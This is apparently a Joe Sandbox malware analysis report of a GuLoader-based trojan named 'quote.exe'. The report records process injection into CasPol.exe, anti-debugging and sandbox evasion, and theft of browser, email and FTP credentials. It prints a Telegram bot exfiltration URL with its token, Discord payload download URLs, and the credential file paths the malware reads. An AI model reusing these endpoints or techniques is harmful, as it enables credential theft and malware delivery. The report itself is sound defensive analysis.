            Source: quote.exe, 00000000.00000002.1325762856.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: quote.exe, 00000000.00000002.1327571703.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: quote.exe, 00000000.00000002.1328205276.0000000004829000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\quote.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_6F491B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F491B5F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C80EDF rdtsc 0_2_02C80EDF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C91E4B mov eax, dword ptr fs:[00000030h]0_2_02C91E4B
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8627E mov eax, dword ptr fs:[00000030h]0_2_02C8627E
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A3C2 mov eax, dword ptr fs:[00000030h]0_2_02C8A3C2
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C9004F mov eax, dword ptr fs:[00000030h]0_2_02C9004F
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A413 mov eax, dword ptr fs:[00000030h]0_2_02C8A413
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A58A mov ebx, dword ptr fs:[00000030h]0_2_02C8A58A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A58A mov eax, dword ptr fs:[00000030h]0_2_02C8A58A
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C89D4C mov eax, dword ptr fs:[00000030h]0_2_02C89D4C
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C8A551 mov eax, dword ptr fs:[00000030h]0_2_02C8A551
            Source: C:\Users\user\Desktop\quote.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_02C90063 LdrLoadDll,0_2_02C90063
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\quote.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1100000Jump to behavior
            Source: C:\Users\user\Desktop\quote.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\quote.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\quote.exeCode function: 0_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034C5

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5136, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5136, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5136, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5136, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5136, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Web Service
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection
            2
            Obfuscated Files or Information
            1
            Credentials in Registry
            431
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration21
            Encrypted Channel
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model21
            Input Capture
            Scheduled Transfer3
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script351
            Virtualization/Sandbox Evasion
            LSA Secrets351
            Virtualization/Sandbox Evasion
            SSH2
            Clipboard Data
            Data Transfer Size Limits14
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            quote.exe9%VirustotalBrowse
            quote.exe8%ReversingLabsWin32.Trojan.GuLoader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195\lang-1038.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195\lang-1038.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll4%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsd599A.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://vDnRAK.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            https://api.ipify.org%t-0%Avira URL Cloudsafe
            http://www.avast.com0/0%Avira URL Cloudsafe
            https://api.ipify.org%%startupfolder%0%Avira URL Cloudsafe
            http://EqRFUPx5nMTltlK0UH.org0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            cdn.discordapp.com
            162.159.130.233
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocumentfalse
                  high
                  http://cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttffalse
                    high
                    https://cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttffalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://vDnRAK.comCasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.telegram.orgCasPol.exe, 00000003.00000002.6090430298.000000001D8A4000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocumentdocument-----CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ipify.org%t-CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000003.00000002.6088337726.000000001D822000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.avast.com0/lang-1038.dll.0.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.discordapp.com/CasPol.exe, 00000003.00000002.6058869094.000000000159B000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://api.ipify.org%%startupfolder%CasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://nsis.sf.net/NSIS_ErrorErrorquote.exefalse
                                high
                                http://EqRFUPx5nMTltlK0UH.orgCasPol.exe, 00000003.00000002.6085712597.000000001D771000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6090829072.000000001D8BA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6089723936.000000001D884000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.1358554320.000000001C641000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.6090278935.000000001D8A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://api.telegram.orgCasPol.exe, 00000003.00000002.6090829072.000000001D8BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000003.00000002.6090430298.000000001D8A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUfalse
                                    162.159.130.233
                                    cdn.discordapp.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    Joe Sandbox Version:35.0.0 Citrine
                                    Analysis ID:687701
                                    Start date and time:2022-08-22 01:55:03 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 14m 19s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:quote.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:17
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@4/5@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 21.7% (good quality ratio 21.2%)
                                    • Quality average: 88.2%
                                    • Quality standard deviation: 21.6%
                                    HCA Information:
                                    • Successful, ratio: 98%
                                    • Number of executed functions: 132
                                    • Number of non-executed functions: 134
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 51.124.57.242, 20.82.207.122, 23.203.70.208, 23.3.109.244, 88.221.169.51
                                    • Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com, definitionupdates.microsoft.com.edgekey.net, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, e13678.dscb.akamaiedge.net, settings-win.data.microsoft.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, wdcpalt.microsoft.com, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, login.live.com, go.microsoft.com.edgekey.net, e12671.g.akamaiedge.net, www.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    TimeTypeDescription
                                    01:57:32API Interceptor2751x Sleep call for process: CasPol.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    149.154.167.220GoogleDrive.exeGet hashmaliciousBrowse
                                      gen_signed.apkGet hashmaliciousBrowse
                                        GEDYBO9p2O.exeGet hashmaliciousBrowse
                                          DOCUMENT REVIEW.exeGet hashmaliciousBrowse
                                            Nuevo orden_________________.PDF.vbsGet hashmaliciousBrowse
                                              RFQ Quotation Req and company information..exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Trojan.GenericKD.61355332.5874.exeGet hashmaliciousBrowse
                                                  XchpPIgstd.exeGet hashmaliciousBrowse
                                                    1QVT4MsJGl.exeGet hashmaliciousBrowse
                                                      cd-7503567009-6777c66647935.exeGet hashmaliciousBrowse
                                                        OutgoingXPayement.docxGet hashmaliciousBrowse
                                                          NPU_4739W2890238839282SUW902________________.exeGet hashmaliciousBrowse
                                                            NEW ORDER.exeGet hashmaliciousBrowse
                                                              TNT Invoicing_pdf.exeGet hashmaliciousBrowse
                                                                TNT Invoicing_pdf.exeGet hashmaliciousBrowse
                                                                  PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Trojan.PWS.Siggen3.21220.31134.exeGet hashmaliciousBrowse
                                                                        fHULHLIrtL.exeGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.MSILHeracles.41449.21207.exeGet hashmaliciousBrowse
                                                                            162.159.130.233MSQNZmmg2F.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
                                                                            b7cwlpwH6S.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
                                                                            order-confirmation.doc__.rtfGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                                            Order Confirmation.docGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                                            cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                                                            SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                                            P20200107.DOCGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                                            FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                                                            SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                                            SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                                            G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                                            Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                                            2021 RFQ Products Required.docGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                                                            Company Reference1.docGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                                                            PAY SLIP.docGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                                            SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                                                            part1.rtfGet hashmaliciousBrowse
                                                                            • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            cdn.discordapp.comE3135F01A3B76A91BB1082FD5B53259FE2D59EB6AB550.exeGet hashmaliciousBrowse
                                                                            • 162.159.133.233
                                                                            22nuoItfxs.exeGet hashmaliciousBrowse
                                                                            • 162.159.134.233
                                                                            l5Pmw9b4cO.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            1UFZlH15s7.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            IJ101F4eV6.exeGet hashmaliciousBrowse
                                                                            • 162.159.133.233
                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                            • 162.159.133.233
                                                                            c5yelcHdhM.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            vIewJYujZv.exeGet hashmaliciousBrowse
                                                                            • 162.159.134.233
                                                                            4fkCS2In3P.exeGet hashmaliciousBrowse
                                                                            • 162.159.133.233
                                                                            hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                            • 162.159.134.233
                                                                            hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                            • 162.159.134.233
                                                                            854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                                                            • 162.159.135.233
                                                                            854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                                                            • 162.159.129.233
                                                                            ORDER_CF2022-24400_pdf.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            854F1E97-5DBB-4A87-A566-43D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                                                            • 162.159.135.233
                                                                            Hgxpur.exeGet hashmaliciousBrowse
                                                                            • 162.159.130.233
                                                                            A.W.Chesterton PEDIDO DE COMPRA TTY56,pdf.exeGet hashmaliciousBrowse
                                                                            • 162.159.129.233
                                                                            ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                            • 162.159.135.233
                                                                            ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                            • 162.159.135.233
                                                                            SecuriteInfo.com.Win32.Injector.ERYZ.5525.exeGet hashmaliciousBrowse
                                                                            • 162.159.129.233
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            TELEGRAMRUGoogleDrive.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            gen_signed.apkGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            GEDYBO9p2O.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            22nuoItfxs.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            l5Pmw9b4cO.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            DOCUMENT REVIEW.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            bCl314fp0e.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            1JcCkNxKB4.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            cF8jYYa5X9.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            kIu9j6WuTA.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            c8ym8UXtAv.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            Nuevo orden_________________.PDF.vbsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            GvjdCbl5gF.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            LY1yJP2eOK.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            RFQ Quotation Req and company information..exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Trojan.GenericKD.61355332.5874.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            2Z2oxGdJFI.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.99
                                                                            XchpPIgstd.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            1QVT4MsJGl.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            cd-7503567009-6777c66647935.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0epaymentslip.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.Variant.Lazy.234097.11251.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            GoogleDrive.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            rF6kGC36OD.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            Ffx5ieG5pk.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            8uV9c7vuZC.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            GEDYBO9p2O.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            ww2Giy8tvD.exeGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            c05dd46de4f8443c84e3d5b2c0af13e1.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
                                                                            e26bc5baab8d74b89058ee041773cf37.jsGet hashmaliciousBrowse
                                                                            • 149.154.167.220
